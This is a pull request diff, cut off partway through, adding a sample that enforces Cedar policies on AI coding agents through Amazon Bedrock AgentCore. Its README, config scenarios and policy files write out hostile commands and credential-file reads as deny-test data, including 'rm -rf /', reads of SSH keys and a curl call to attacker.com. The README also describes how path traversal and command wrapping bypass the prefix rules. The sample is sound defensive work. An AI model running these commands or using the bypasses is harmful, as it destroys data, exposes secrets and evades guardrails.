### PR TITLE
[securing-coding-agents] Add Cedar policy sample for coding agent security

### DIFF
--- a/02-use-cases/securing-coding-agents/.gitignore
+++ b/02-use-cases/securing-coding-agents/.gitignore
@@ -1,0 +1,13 @@
+__pycache__/
+*.pyc
+.venv/
+venv/
+.pytest_cache/
+*.egg-info/
+dist/
+build/
+.state.json
+.bedrock_agentcore.yaml
+.bedrock_agentcore/
+.env
+node_modules/

--- a/02-use-cases/securing-coding-agents/README.md
+++ b/02-use-cases/securing-coding-agents/README.md
@@ -1,0 +1,300 @@
+# Securing Coding Agents with Cedar Policies on Amazon Bedrock AgentCore
+
+This sample demonstrates how to enforce fine-grained access control on AI coding agents using [Cedar](https://www.cedarpolicy.com/) policies with Amazon Bedrock AgentCore's Gateway and Policy Engine.
+
+## Overview
+
+When AI agents have access to powerful tools (file system, shell, code execution), you need guardrails to prevent dangerous operations. This sample shows how to:
+
+- **Restrict file access** to workspace directories only (deny `/etc/passwd`, allow `/workspace/src/`)
+- **Block dangerous shell commands** (`rm -rf /`, `sudo`, `chmod 777`) while allowing safe ones (`npm test`)
+- **Gate tool access** — forbid code execution, retrieval, and HTTP tools without proper authorization
+- **Deny admin-only tools** — blanket forbid external API invocation
+
+All enforcement happens at the AgentCore Gateway level using Cedar policies evaluated by the Policy Engine — the agent itself never sees denied requests.
+
+## Architecture
+
+```mermaid
+sequenceDiagram
+    participant User
+    participant Agent as Coding Agent (Runtime)
+    participant GW as AgentCore Gateway
+    participant PE as Policy Engine (Cedar)
+    participant Tool as MCP Tool Target
+
+    User->>Agent: "Write tests for auth module"
+    Agent->>GW: tools/call: write_file(/workspace/src/test.py)
+    GW->>PE: Authorize(action, resource, context)
+    PE-->>GW: ALLOW (path matches /workspace/src/*)
+    GW->>Tool: Execute write_file
+    Tool-->>GW: Success
+    GW-->>Agent: Result
+    Agent-->>User: "Tests written ✓"
+
+    User->>Agent: "Read SSH keys"
+    Agent->>GW: tools/call: read_file(/root/.ssh/id_rsa)
+    GW->>PE: Authorize(action, resource, context)
+    PE-->>GW: DENY (path outside /workspace/src/*)
+    GW-->>Agent: Error: Access Denied
+    Agent-->>User: "I can't access that path — it's outside the workspace."
+```
+
+## Prerequisites
+
+| Requirement | Version | Notes |
+|-------------|---------|-------|
+| Python | 3.11+ | For provisioning scripts |
+| Node.js | 20+ | For AgentCore CLI |
+| AWS CLI | 2.x | Configured with valid credentials |
+| AgentCore CLI | Latest | `npm install -g @aws/agentcore` |
+| AWS credentials | — | Must have Bedrock AgentCore permissions |
+
+## Quick Start
+
+```bash
+# 1. Install dependencies
+pip install -r requirements.txt
+
+# 2. Deploy Gateway + Policy Engine + run scenarios
+python -m src.deploy
+
+# 3. (Optional) Run the interactive agent demo
+pip install mcp
+python agent_demo.py
+
+# 4. Clean up all resources when done
+python -m src.cleanup
+```
+
+## Cedar Policy Architecture
+
+| File | Pattern | Purpose |
+|------|---------|---------|
+| `file_access.cedar` | `permit` with path conditions | Allow read/write only under `/workspace/src/*` |
+| `command_execution.cedar` | `forbid` + `permit` | Block `rm -rf`, `sudo`, `chmod 777`; allow `npm test` |
+| `tool_restrictions.cedar` | `forbid` (blanket) | Deny code execution, retrieval, HTTP tools |
+| `tool_access.cedar` | `forbid` (blanket) | Deny external API invocation entirely |
+
+### How Cedar Evaluation Works
+
+Cedar uses a **default-deny** model with explicit `permit` and `forbid` statements:
+
+1. If any `forbid` matches → **DENY** (forbid always wins)
+2. If at least one `permit` matches → **ALLOW**
+3. If nothing matches → **DENY** (implicit default deny)
+
+This means our policies layer as:
+- `forbid` rules catch dangerous patterns first (rm -rf, sudo, etc.)
+- `permit` rules explicitly allow safe operations
+- Anything not explicitly permitted is denied
+
+## Demo Scenarios
+
+### Gateway Scenarios (12 total)
+
+| # | Scenario | Tool | Expected | Why |
+|---|----------|------|----------|-----|
+| 1 | Write to workspace | `write_file` | ALLOW | Path matches `/workspace/src/*` |
+| 2 | Write to /etc/passwd | `write_file` | DENY | Path outside workspace |
+| 3 | Read from workspace | `read_file` | ALLOW | Path matches `/workspace/src/*` |
+| 4 | Read SSH keys | `read_file` | DENY | Path outside workspace |
+| 5 | Run npm test | `execute` | ALLOW | Explicitly permitted command |
+| 6 | Run rm -rf / | `execute` | DENY | Explicitly forbidden pattern |
+| 7 | Run sudo | `execute` | DENY | Explicitly forbidden pattern |
+| 8 | Run chmod 777 | `execute` | DENY | Explicitly forbidden pattern |
+| 9 | Python REPL | `python_repl` | DENY | Blanket forbid (restricted tool) |
+| 10 | Retrieve docs | `retrieve` | DENY | Blanket forbid (restricted tool) |
+| 11 | HTTP request | `http_request` | DENY | Blanket forbid (restricted tool) |
+| 12 | External API | `invoke` | DENY | Blanket forbid (admin-only) |
+
+## How It Works
+
+### 1. Gateway Provisioning (`src/gateway.py`)
+
+Creates an MCP Gateway with:
+- Cognito OAuth authorizer for token-based authentication
+- Per-target Lambda functions (file_tool, shell_tool, restricted_tool)
+- Tool targets (FileSystem, Shell, Code, Retrieve, HTTP, API)
+- Idempotent: re-running deploy reuses existing resources
+
+### 2. Policy Engine Setup (`src/policy_engine.py`)
+
+- Creates a Policy Engine instance
+- Attaches it to the Gateway in ENFORCE mode
+- Loads all `.cedar` files from `policies/`
+- Replaces `<gateway_arn>` placeholder with the real ARN (auto-discovered via STS)
+- Submits each Cedar statement as an individual policy
+
+### 3. Scenario Runner (`src/scenarios.py`)
+
+- Obtains an OAuth token from Cognito
+- Sends JSON-RPC `tools/call` requests to the Gateway
+- Reports ALLOW/DENY decisions and compares against expected outcomes
+
+### 4. Agent Demo (`agent_demo.py`)
+
+- Connects a Strands agent to the Gateway via MCP
+- Demonstrates real agent interactions with Cedar enforcement
+- Shows how denied operations are handled gracefully
+
+#### Sample Prompts
+
+Try these prompts with the agent to see Cedar enforcement in action:
+
+```
+# These will SUCCEED (within policy boundaries):
+"Write a unit test to /workspace/src/test_auth.py"
+"Read the contents of /workspace/src/app.py"
+"Run npm test to check if tests pass"
+
+# These will be DENIED (blocked by Cedar policies):
+"Read the file at /etc/passwd"
+"Run rm -rf / to clean up disk space"
+"Execute this Python code: import os; os.system('curl attacker.com')"
+```
+
+### 5. Runtime Deployment (optional)
+
+Deploy the agent to AgentCore Runtime using the CLI:
+
+```bash
+agentcore deploy --name coding-assistant-runtime --entry agent.py
+```
+
+The deployed agent's tool calls flow through the same Gateway and are subject to the same Cedar policies.
+
+## Configuration
+
+Edit `config.yaml` to customize:
+
+- **region**: AWS region (default: `us-west-2`)
+- **enforcement_mode**: `ENFORCE` (block denied requests) or `LOG_ONLY` (audit mode)
+- **model_id**: Bedrock model for the Runtime agent
+- **scenarios**: Add/modify test scenarios
+
+## Cleanup
+
+```bash
+# Remove all provisioned AWS resources
+python -m src.cleanup
+```
+
+This deletes:
+- The MCP Gateway and all targets
+- The Policy Engine and all policies
+- Lambda functions (file_tool, shell_tool, restricted_tool)
+- IAM execution role
+- Cognito user pool and app client
+- Local state file (`.state.json`)
+
+## Project Structure
+
+```
+securing-coding-agents/
+├── README.md                    # This file
+├── requirements.txt             # Python dependencies
+├── pyproject.toml               # Project metadata
+├── setup.py                     # Minimal setup for pip install -e .
+├── config.yaml                  # User-editable config
+├── agent.py                     # Strands Agent entrypoint (for agentcore deploy)
+├── agent_demo.py                # Interactive agent demo with MCP
+├── policies/
+│   ├── file_access.cedar        # Path-based file access control
+│   ├── command_execution.cedar  # Shell command allow/deny
+│   ├── tool_restrictions.cedar  # Blanket forbid for restricted tools
+│   └── tool_access.cedar        # Tool-level forbid (admin-only tools)
+├── utils/
+│   ├── file_tool.js             # Lambda: read_file, write_file, list_directory
+│   ├── shell_tool.js            # Lambda: execute (shell commands)
+│   └── restricted_tool.js       # Lambda: restricted tools (should never be reached)
+├── src/
+│   ├── __init__.py
+│   ├── deploy.py                # Main orchestrator
+│   ├── gateway.py               # Gateway + Lambda + Cognito provisioning
+│   ├── policy_engine.py         # Policy Engine + Cedar policy loading
+│   ├── scenarios.py             # Demo scenario runner
+│   ├── cleanup.py               # Full resource teardown
+│   └── utils.py                 # Shared helpers
+├── tests/
+│   ├── __init__.py
+│   └── test_scenarios.py        # Basic test for scenario runner
+└── .gitignore
+```
+
+## Security
+
+- **No hardcoded credentials** — all AWS account IDs and ARNs are resolved dynamically via STS
+- **No secrets in config** — OAuth tokens are obtained at runtime from Cognito
+- **State file excluded** — `.state.json` is in `.gitignore`
+- **Least privilege** — Cedar policies follow default-deny; only explicitly permitted actions succeed
+- **Per-target Lambdas** — each tool category has its own isolated Lambda function
+
+## Security Notes for Production
+
+This sample demonstrates Cedar policy patterns. When adapting for production, address these known limitations:
+
+### Path Traversal
+
+Cedar's `like` operator performs glob-style matching. The pattern `/workspace/src/*` matches any string *starting with* that prefix — including `/workspace/src/../../etc/passwd`. The `*` wildcard does not perform filesystem path resolution.
+
+**Mitigation:** Canonicalize paths before they reach Cedar evaluation. Your Lambda tool handler (or a Gateway request transformer) must:
+1. Resolve `..` and `.` components
+2. Resolve symlinks
+3. Verify the canonical path still starts with the allowed prefix
+
+```python
+import os
+canonical = os.path.realpath(requested_path)
+if not canonical.startswith("/workspace/src/"):
+    raise PermissionError("Path outside workspace")
+```
+
+### Command Pattern Bypass
+
+The `forbid` rules use prefix matching (`like "rm -rf*"`). Commands can be wrapped to bypass these: `bash -c "rm -rf /"`, `/bin/rm -rf /`, `env sudo apt install`.
+
+**Why this is safe in the sample:** The permit rule is a strict 3-command allowlist (`== "npm test"` etc.). The forbid rules are defense-in-depth — they catch dangerous commands for logging/auditing purposes, but the allowlist is the actual security boundary.
+
+**If adapting:** Never loosen the permit rule to a broad pattern (e.g., `like "npm*"`) without also strengthening the forbid rules to use `like "*rm -rf*"` (contains-match) or implementing server-side command parsing.
+
+### Observability
+
+The Gateway logs all policy decisions to CloudWatch Logs at:
+```
+/aws/vendedlogs/bedrock-agentcore/gateway/APPLICATION_LOGS/{gateway-id}
+```
+
+Query policy denials with:
+```bash
+aws logs filter-log-events \
+  --log-group-name "/aws/vendedlogs/bedrock-agentcore/gateway/APPLICATION_LOGS/{gateway-id}" \
+  --filter-pattern "DENY" \
+  --region us-west-2
+```
+
+### Production Considerations
+
+| Consideration | Status | Notes |
+|---------------|--------|-------|
+| Path canonicalization | Not included | Must implement in your tool backend |
+| Rate limiting | Not included | Add AWS WAF in front of Gateway URL |
+| Offline policy testing | Not included | Cedar CLI can validate policies locally (requires schema alignment with AgentCore entity types) |
+| Principal-based policies | Not shown | See the `02-policy` sample for ABAC with JWT claims |
+| Policy versioning | Not included | Use infrastructure-as-code (CDK/CloudFormation) for policy lifecycle |
+
+## Differentiation from 02-policy Sample
+
+The existing `02-policy` sample demonstrates ABAC with JWT claims for an insurance underwriting use case. This sample is differentiated by focusing on **coding agent security**:
+
+| Aspect | 02-policy | This sample |
+|--------|-----------|-------------|
+| Use case | Insurance underwriting | Coding agent security |
+| Auth model | ABAC (JWT claims) | Path-based + command blocklists |
+| Policy focus | Role-based access | Tool-level restrictions |
+| Targets | Generic | Per-tool Lambdas (file, shell, restricted) |
+| Agent integration | None | Strands agent with MCP |
+
+## License
+
+This sample is provided under the Apache License 2.0. See the [LICENSE](../../LICENSE) file for details.

--- a/02-use-cases/securing-coding-agents/agent.py
+++ b/02-use-cases/securing-coding-agents/agent.py
@@ -1,0 +1,33 @@
+"""Strands Agent entrypoint for AgentCore Runtime deployment.
+
+This file is the entrypoint used by `agentcore deploy`. It defines
+the coding assistant agent with tools that are gated by Cedar policies
+at the Gateway level.
+"""
+
+from strands import Agent
+from strands.models.bedrock import BedrockModel
+
+
+def create_agent():
+    """Create the coding assistant agent."""
+    model = BedrockModel(
+        model_id="us.anthropic.claude-sonnet-4-20250514",
+        region_name="us-west-2",
+    )
+
+    agent = Agent(
+        model=model,
+        system_prompt=(
+            "You are a coding assistant. You help developers write, review, "
+            "and debug code. You have access to file system, shell, and code "
+            "execution tools. All tool calls are governed by Cedar policies "
+            "enforced at the AgentCore Gateway — some actions may be denied "
+            "based on security policies."
+        ),
+    )
+    return agent
+
+
+# AgentCore Runtime expects a module-level agent instance
+agent = create_agent()

--- a/02-use-cases/securing-coding-agents/agent_demo.py
+++ b/02-use-cases/securing-coding-agents/agent_demo.py
@@ -1,0 +1,77 @@
+"""Demonstrate a Strands coding agent with Cedar policy enforcement."""
+
+from __future__ import annotations
+
+import sys
+
+from mcp.client.streamable_http import streamablehttp_client
+from strands import Agent
+from strands.models.bedrock import BedrockModel
+from strands.tools.mcp import MCPClient
+
+from src.utils import bold, load_state
+
+
+def main():
+    """Run the coding agent demo against the deployed Gateway."""
+    state = load_state()
+    if not state:
+        print("No deployment found. Run 'python -m src.deploy' first.")
+        sys.exit(1)
+
+    gateway_url = state["gateway_url"]
+    client_info = state["client_info"]
+
+    # Get a fresh token
+    from bedrock_agentcore_starter_toolkit.operations.gateway.client import GatewayClient
+
+    gw_client = GatewayClient(region_name=state["region"])
+    token = gw_client.get_access_token_for_cognito(client_info)
+
+    print(f"\n{bold('Coding Agent Demo — Cedar Policy Enforcement')}")
+    print(f"  Gateway: {gateway_url}\n")
+
+    # Connect to Gateway via MCP
+    with MCPClient(
+        lambda: streamablehttp_client(
+            gateway_url,
+            headers={"Authorization": f"Bearer {token}"},
+        )
+    ) as mcp_client:
+        tools = mcp_client.list_tools_sync()
+        print(f"  Available tools: {[t.name for t in tools]}\n")
+
+        model = BedrockModel(
+            model_id="us.anthropic.claude-sonnet-4-20250514",
+            region_name=state["region"],
+        )
+        agent = Agent(
+            model=model,
+            tools=tools,
+            system_prompt=(
+                "You are a coding assistant. You help write and test code. "
+                "Use the available tools to complete tasks. If a tool call is "
+                "denied, explain that the operation is restricted by security policy."
+            ),
+        )
+
+        # Demo scenarios
+        scenarios = [
+            (
+                "Write a test file to the workspace",
+                "Write a simple test to /workspace/src/test_auth.py",
+            ),
+            ("Try to read sensitive files (should be DENIED)", "Read the file at /etc/passwd"),
+            ("Run allowed test command", "Run 'npm test' to execute the test suite"),
+            ("Try dangerous command (should be DENIED)", "Run 'rm -rf /' to clean up"),
+        ]
+
+        for title, prompt in scenarios:
+            print(f"\n{bold(f'Scenario: {title}')}")
+            print(f"  Prompt: {prompt}")
+            result = agent(prompt)
+            print(f"  Agent: {result}")
+
+
+if __name__ == "__main__":
+    main()

--- a/02-use-cases/securing-coding-agents/config.yaml
+++ b/02-use-cases/securing-coding-agents/config.yaml
@@ -1,0 +1,128 @@
+# AgentCore Policy Sample Configuration
+# All AWS resource IDs are auto-discovered — do not hardcode ARNs here.
+
+region: us-west-2
+
+policy_engine:
+  name: coding-agent-policy-engine
+  policies_dir: ./policies
+  enforcement_mode: ENFORCE  # ENFORCE or LOG_ONLY
+
+runtime:
+  name: coding-assistant-runtime
+  model_id: us.anthropic.claude-sonnet-4-20250514
+
+scenarios:
+  # --- File System: ALLOW (within workspace) ---
+  - name: allow-file-write-workspace
+    target: FileSystemTarget
+    tool: write_file
+    input: {path: "/workspace/src/main.py", content: "print('hello')"}
+    expected: ALLOW
+
+  - name: allow-file-read-workspace
+    target: FileSystemTarget
+    tool: read_file
+    input: {path: "/workspace/src/app.py"}
+    expected: ALLOW
+
+  - name: allow-file-write-test
+    target: FileSystemTarget
+    tool: write_file
+    input: {path: "/workspace/src/tests/test_auth.py", content: "def test_login(): pass"}
+    expected: ALLOW
+
+  - name: allow-file-read-config
+    target: FileSystemTarget
+    tool: read_file
+    input: {path: "/workspace/src/config.json"}
+    expected: ALLOW
+
+  - name: allow-list-workspace
+    target: FileSystemTarget
+    tool: list_directory
+    input: {path: "/workspace/src/"}
+    expected: ALLOW
+
+  # --- File System: DENY (outside workspace) ---
+  - name: deny-file-write-etc
+    target: FileSystemTarget
+    tool: write_file
+    input: {path: "/etc/passwd", content: "malicious"}
+    expected: DENY
+
+  - name: deny-file-read-ssh-keys
+    target: FileSystemTarget
+    tool: read_file
+    input: {path: "/root/.ssh/id_rsa"}
+    expected: DENY
+
+  - name: deny-file-read-env
+    target: FileSystemTarget
+    tool: read_file
+    input: {path: "/home/user/.env"}
+    expected: DENY
+
+  # --- Shell: ALLOW (safe commands) ---
+  - name: allow-shell-npm-test
+    target: ShellTarget
+    tool: execute
+    input: {command: "npm test"}
+    expected: ALLOW
+
+  - name: allow-shell-npm-build
+    target: ShellTarget
+    tool: execute
+    input: {command: "npm run build"}
+    expected: ALLOW
+
+  - name: allow-shell-pytest
+    target: ShellTarget
+    tool: execute
+    input: {command: "python -m pytest"}
+    expected: ALLOW
+
+  # --- Shell: DENY (dangerous commands) ---
+  - name: deny-shell-rm-rf
+    target: ShellTarget
+    tool: execute
+    input: {command: "rm -rf /"}
+    expected: DENY
+
+  - name: deny-shell-sudo
+    target: ShellTarget
+    tool: execute
+    input: {command: "sudo apt install malware"}
+    expected: DENY
+
+  - name: deny-shell-chmod-777
+    target: ShellTarget
+    tool: execute
+    input: {command: "chmod 777 /tmp/script.sh"}
+    expected: DENY
+
+  # --- Restricted Tools: DENY (blanket forbid) ---
+  - name: deny-python-repl
+    target: CodeTarget
+    tool: python_repl
+    input: {code: "print(2+2)"}
+    expected: DENY
+
+  - name: deny-retrieve
+    target: RetrieveTarget
+    tool: retrieve
+    input: {query: "auth handler", top_k: 3}
+    expected: DENY
+
+  - name: deny-http-request
+    target: HttpTarget
+    tool: http_request
+    input: {url: "https://api.github.com/repos", method: "GET"}
+    expected: DENY
+
+  # --- Admin Tools: DENY (blanket forbid) ---
+  - name: deny-api-invoke
+    target: ApiTarget
+    tool: invoke
+    input: {endpoint: "https://external.example.com", method: "POST"}
+    expected: DENY

--- a/02-use-cases/securing-coding-agents/policies/command_execution.cedar
+++ b/02-use-cases/securing-coding-agents/policies/command_execution.cedar
@@ -1,0 +1,23 @@
+forbid(
+  principal,
+  action == AgentCore::Action::"ShellTarget___execute",
+  resource == AgentCore::Gateway::"<gateway_arn>"
+)
+when {
+  context.input has command &&
+  (context.input.command like "rm -rf*" ||
+   context.input.command like "sudo*" ||
+   context.input.command like "chmod 777*")
+};
+
+permit(
+  principal,
+  action == AgentCore::Action::"ShellTarget___execute",
+  resource == AgentCore::Gateway::"<gateway_arn>"
+)
+when {
+  context.input has command &&
+  (context.input.command == "npm test" ||
+   context.input.command == "npm run build" ||
+   context.input.command == "python -m pytest")
+};

--- a/02-use-cases/securing-coding-agents/policies/file_access.cedar
+++ b/02-use-cases/securing-coding-agents/policies/file_access.cedar
@@ -1,0 +1,29 @@
+permit(
+  principal,
+  action == AgentCore::Action::"FileSystemTarget___read_file",
+  resource == AgentCore::Gateway::"<gateway_arn>"
+)
+when {
+  context.input has path &&
+  context.input.path like "/workspace/src/*"
+};
+
+permit(
+  principal,
+  action == AgentCore::Action::"FileSystemTarget___write_file",
+  resource == AgentCore::Gateway::"<gateway_arn>"
+)
+when {
+  context.input has path &&
+  context.input.path like "/workspace/src/*"
+};
+
+permit(
+  principal,
+  action == AgentCore::Action::"FileSystemTarget___list_directory",
+  resource == AgentCore::Gateway::"<gateway_arn>"
+)
+when {
+  context.input has path &&
+  context.input.path like "/workspace/src/*"
+};

--- a/02-use-cases/securing-coding-agents/policies/tool_access.cedar
+++ b/02-use-cases/securing-coding-agents/policies/tool_access.cedar
@@ -1,0 +1,5 @@
+forbid(
+  principal,
+  action == AgentCore::Action::"ApiTarget___invoke",
+  resource == AgentCore::Gateway::"<gateway_arn>"
+);

--- a/02-use-cases/securing-coding-agents/policies/tool_restrictions.cedar
+++ b/02-use-cases/securing-coding-agents/policies/tool_restrictions.cedar
@@ -1,0 +1,20 @@
+forbid(
+  principal,
+  action in [
+    AgentCore::Action::"CodeTarget___python_repl",
+    AgentCore::Action::"CodeTarget___execute_code"
+  ],
+  resource == AgentCore::Gateway::"<gateway_arn>"
+);
+
+forbid(
+  principal,
+  action == AgentCore::Action::"RetrieveTarget___retrieve",
+  resource == AgentCore::Gateway::"<gateway_arn>"
+);
+
+forbid(
+  principal,
+  action == AgentCore::Action::"HttpTarget___http_request",
+  resource == AgentCore::Gateway::"<gateway_arn>"
+);

--- a/02-use-cases/securing-coding-agents/pyproject.toml
+++ b/02-use-cases/securing-coding-agents/pyproject.toml
@@ -1,0 +1,30 @@
+[project]
+name = "securing-coding-agents"
+version = "1.0.0"
+description = "Securing coding agents with Cedar policies on Amazon Bedrock AgentCore"
+requires-python = ">=3.11"
+dependencies = [
+    "boto3>=1.35.0",
+    "requests>=2.31.0",
+    "pyyaml>=6.0",
+    "bedrock-agentcore-starter-toolkit",
+    "strands-agents[bedrock]",
+]
+
+[project.optional-dependencies]
+dev = ["pytest>=7.0"]
+agent = ["mcp"]
+
+[project.scripts]
+deploy = "src.deploy:main"
+cleanup = "src.cleanup:main"
+
+[tool.uv]
+dev-dependencies = ["pytest>=7.0"]
+
+[tool.ruff]
+line-length = 100
+target-version = "py311"
+
+[tool.ruff.lint]
+select = ["E", "F", "I", "B"]

--- a/02-use-cases/securing-coding-agents/requirements.txt
+++ b/02-use-cases/securing-coding-agents/requirements.txt
@@ -1,0 +1,5 @@
+boto3>=1.35.0
+requests>=2.31.0
+pyyaml>=6.0
+bedrock-agentcore-starter-toolkit
+strands-agents[bedrock]

--- a/02-use-cases/securing-coding-agents/src/cleanup.py
+++ b/02-use-cases/securing-coding-agents/src/cleanup.py
@@ -1,0 +1,138 @@
+"""Clean up all provisioned AWS resources."""
+
+from __future__ import annotations
+
+import os
+import time
+
+import boto3
+
+from .utils import bold, load_state
+
+
+def cleanup() -> None:
+    """Delete Gateway, Policy Engine, Lambda functions, IAM roles, Cognito, and state."""
+    state = load_state()
+    if not state:
+        print("No state file found. Nothing to clean up.")
+        return
+
+    region = state.get("region", "us-west-2")
+    gateway_id = state.get("gateway_id")
+    policy_engine_id = state.get("policy_engine_id")
+    lambda_arns = state.get("lambda_arns", {})
+    iam_role_arn = state.get("iam_role_arn")
+    client_info = state.get("client_info", {})
+
+    print(f"{bold('Cleaning up resources...')}")
+
+    # 1. Delete Gateway (targets are cleaned up by the toolkit)
+    if gateway_id:
+        try:
+            from bedrock_agentcore_starter_toolkit.operations.gateway.client import GatewayClient
+
+            gw_client = GatewayClient(region_name=region)
+            gw_client.cleanup_gateway(gateway_id=gateway_id)
+            print(f"  ✓ Gateway deleted: {gateway_id}")
+        except Exception as e:
+            print(f"  ✗ Gateway cleanup failed: {e}")
+
+    # 2. Delete Policy Engine (must delete policies first)
+    if policy_engine_id:
+        try:
+            ac_client = boto3.client("bedrock-agentcore-control", region_name=region)
+
+            # Delete all policies from the engine
+            policies = ac_client.list_policies(
+                policyEngineId=policy_engine_id, maxResults=50
+            ).get("policies", [])
+            for p in policies:
+                ac_client.delete_policy(policyEngineId=policy_engine_id, policyId=p["policyId"])
+
+            # Wait for policy deletion to propagate
+            if policies:
+                time.sleep(5)
+
+            # Retry PE deletion (may take time to dissociate from gateway)
+            for attempt in range(6):
+                try:
+                    ac_client.delete_policy_engine(policyEngineId=policy_engine_id)
+                    print(f"  ✓ Policy Engine deleted: {policy_engine_id}")
+                    break
+                except Exception as e2:
+                    if attempt < 5 and "associated" in str(e2).lower():
+                        time.sleep(10)
+                    else:
+                        print(f"  ✗ Policy Engine deletion failed: {e2}")
+                        break
+        except Exception as e:
+            print(f"  ✗ Policy Engine cleanup failed: {e}")
+
+    # 3. Delete Lambda functions
+    if lambda_arns:
+        lambda_client = boto3.client("lambda", region_name=region)
+        for func_name, _arn in lambda_arns.items():
+            try:
+                lambda_client.delete_function(FunctionName=func_name)
+                print(f"  ✓ Lambda deleted: {func_name}")
+            except Exception as e:
+                print(f"  ✗ Lambda cleanup failed ({func_name}): {e}")
+
+    # 4. Delete IAM role
+    if iam_role_arn:
+        iam_client = boto3.client("iam", region_name=region)
+        role_name = iam_role_arn.split("/")[-1] if "/" in iam_role_arn else iam_role_arn
+        try:
+            # Detach managed policies
+            attached = iam_client.list_attached_role_policies(RoleName=role_name)
+            for policy in attached.get("AttachedPolicies", []):
+                iam_client.detach_role_policy(RoleName=role_name, PolicyArn=policy["PolicyArn"])
+            # Delete inline policies
+            inline = iam_client.list_role_policies(RoleName=role_name)
+            for policy_name in inline.get("PolicyNames", []):
+                iam_client.delete_role_policy(RoleName=role_name, PolicyName=policy_name)
+            iam_client.delete_role(RoleName=role_name)
+            print(f"  ✓ IAM role deleted: {role_name}")
+        except Exception as e:
+            print(f"  ✗ IAM role cleanup failed: {e}")
+
+    # 5. Delete Cognito resources (domain must be deleted before pool)
+    user_pool_id = client_info.get("user_pool_id")
+    if user_pool_id:
+        cognito_client = boto3.client("cognito-idp", region_name=region)
+        try:
+            # Delete domain first (required before pool deletion)
+            domain_prefix = client_info.get("domain_prefix", "")
+            if domain_prefix:
+                cognito_client.delete_user_pool_domain(
+                    UserPoolId=user_pool_id, Domain=domain_prefix
+                )
+            else:
+                # Try to discover domain from pool description
+                desc = cognito_client.describe_user_pool(UserPoolId=user_pool_id)
+                domain = desc["UserPool"].get("Domain", "")
+                if domain:
+                    cognito_client.delete_user_pool_domain(
+                        UserPoolId=user_pool_id, Domain=domain
+                    )
+
+            cognito_client.delete_user_pool(UserPoolId=user_pool_id)
+            print(f"  ✓ Cognito user pool deleted: {user_pool_id}")
+        except Exception as e:
+            print(f"  ✗ Cognito cleanup failed: {e}")
+
+    # 6. Remove state file
+    if os.path.exists(".state.json"):
+        os.remove(".state.json")
+        print("  ✓ State file removed")
+
+    print("Done.")
+
+
+def main() -> None:
+    """Entry point for python -m src.cleanup."""
+    cleanup()
+
+
+if __name__ == "__main__":
+    main()

--- a/02-use-cases/securing-coding-agents/src/cleanup.py
+++ b/02-use-cases/securing-coding-agents/src/cleanup.py
@@ -43,9 +43,9 @@ def cleanup() -> None:
             ac_client = boto3.client("bedrock-agentcore-control", region_name=region)
 
             # Delete all policies from the engine
-            policies = ac_client.list_policies(
-                policyEngineId=policy_engine_id, maxResults=50
-            ).get("policies", [])
+            policies = ac_client.list_policies(policyEngineId=policy_engine_id, maxResults=50).get(
+                "policies", []
+            )
             for p in policies:
                 ac_client.delete_policy(policyEngineId=policy_engine_id, policyId=p["policyId"])
 
@@ -112,9 +112,7 @@ def cleanup() -> None:
                 desc = cognito_client.describe_user_pool(UserPoolId=user_pool_id)
                 domain = desc["UserPool"].get("Domain", "")
                 if domain:
-                    cognito_client.delete_user_pool_domain(
-                        UserPoolId=user_pool_id, Domain=domain
-                    )
+                    cognito_client.delete_user_pool_domain(UserPoolId=user_pool_id, Domain=domain)
 
             cognito_client.delete_user_pool(UserPoolId=user_pool_id)
             print(f"  ✓ Cognito user pool deleted: {user_pool_id}")

--- a/02-use-cases/securing-coding-agents/src/deploy.py
+++ b/02-use-cases/securing-coding-agents/src/deploy.py
@@ -1,0 +1,67 @@
+"""Main orchestrator: provision Gateway, Policy Engine, run scenarios."""
+
+from __future__ import annotations
+
+import sys
+
+from .gateway import setup_gateway
+from .policy_engine import setup_policy_engine
+from .scenarios import print_summary, run_gateway_scenarios
+from .utils import bold, get_account_id, load_config, save_state
+
+
+def main() -> None:
+    """Deploy Gateway + Policy Engine, run Cedar policy scenarios."""
+    config = load_config()
+    region = config["region"]
+
+    # Validate credentials
+    print("Validating AWS credentials...")
+    account_id = get_account_id(region)
+    print(f"  Account: {account_id}")
+    print(f"  Region:  {region}")
+
+    # Step 1: Provision Gateway
+    print(f"\n{bold('Setting up MCP Gateway...')}")
+    gw = setup_gateway(region)
+
+    state = {
+        "region": region,
+        "gateway_id": gw["gateway_id"],
+        "gateway_url": gw["gateway_url"],
+        "client_info": gw["client_info"],
+        "lambda_arns": gw["lambda_arns"],
+        "iam_role_arn": gw["iam_role_arn"],
+    }
+    save_state(state)
+
+    # Step 2: Provision Policy Engine + Cedar policies
+    print(f"\n{bold('Setting up Policy Engine...')}")
+    pe_config = config["policy_engine"]
+    pe = setup_policy_engine(
+        region=region,
+        gateway_client=gw["gateway_client"],
+        gateway=gw["gateway"],
+        policies_dir=pe_config["policies_dir"],
+        enforcement_mode=pe_config["enforcement_mode"],
+        gateway_id=gw["gateway_id"],
+    )
+    state["policy_engine_id"] = pe["policy_engine_id"]
+    save_state(state)
+
+    # Step 3: Run scenarios
+    print(f"\n{bold('Running Cedar policy scenarios...')}")
+    bearer_token = gw["gateway_client"].get_access_token_for_cognito(gw["client_info"])
+    results = run_gateway_scenarios(gw["gateway_url"], bearer_token, config["scenarios"])
+    passed = print_summary(results)
+
+    # Cleanup instructions
+    print(f"\n{bold('Cleanup:')}")
+    print("  python -m src.cleanup")
+
+    if not passed:
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()

--- a/02-use-cases/securing-coding-agents/src/gateway.py
+++ b/02-use-cases/securing-coding-agents/src/gateway.py
@@ -1,0 +1,379 @@
+"""Gateway provisioning using the bedrock-agentcore starter toolkit."""
+
+from __future__ import annotations
+
+import io
+import json
+import time
+import zipfile
+
+import boto3
+from bedrock_agentcore_starter_toolkit.operations.gateway.client import GatewayClient
+
+from .utils import get_account_id
+
+# Tool definitions for each target — these are what Cedar policies evaluate against
+TARGET_TOOLS = {
+    "FileSystemTarget": [
+        {
+            "name": "read_file",
+            "description": "Read a file from the filesystem",
+            "inputSchema": {
+                "type": "object",
+                "properties": {"path": {"type": "string"}},
+                "required": ["path"],
+            },
+        },
+        {
+            "name": "write_file",
+            "description": "Write content to a file",
+            "inputSchema": {
+                "type": "object",
+                "properties": {"path": {"type": "string"}, "content": {"type": "string"}},
+                "required": ["path", "content"],
+            },
+        },
+        {
+            "name": "list_directory",
+            "description": "List directory contents",
+            "inputSchema": {
+                "type": "object",
+                "properties": {"path": {"type": "string"}},
+                "required": ["path"],
+            },
+        },
+    ],
+    "ShellTarget": [
+        {
+            "name": "execute",
+            "description": "Execute a shell command",
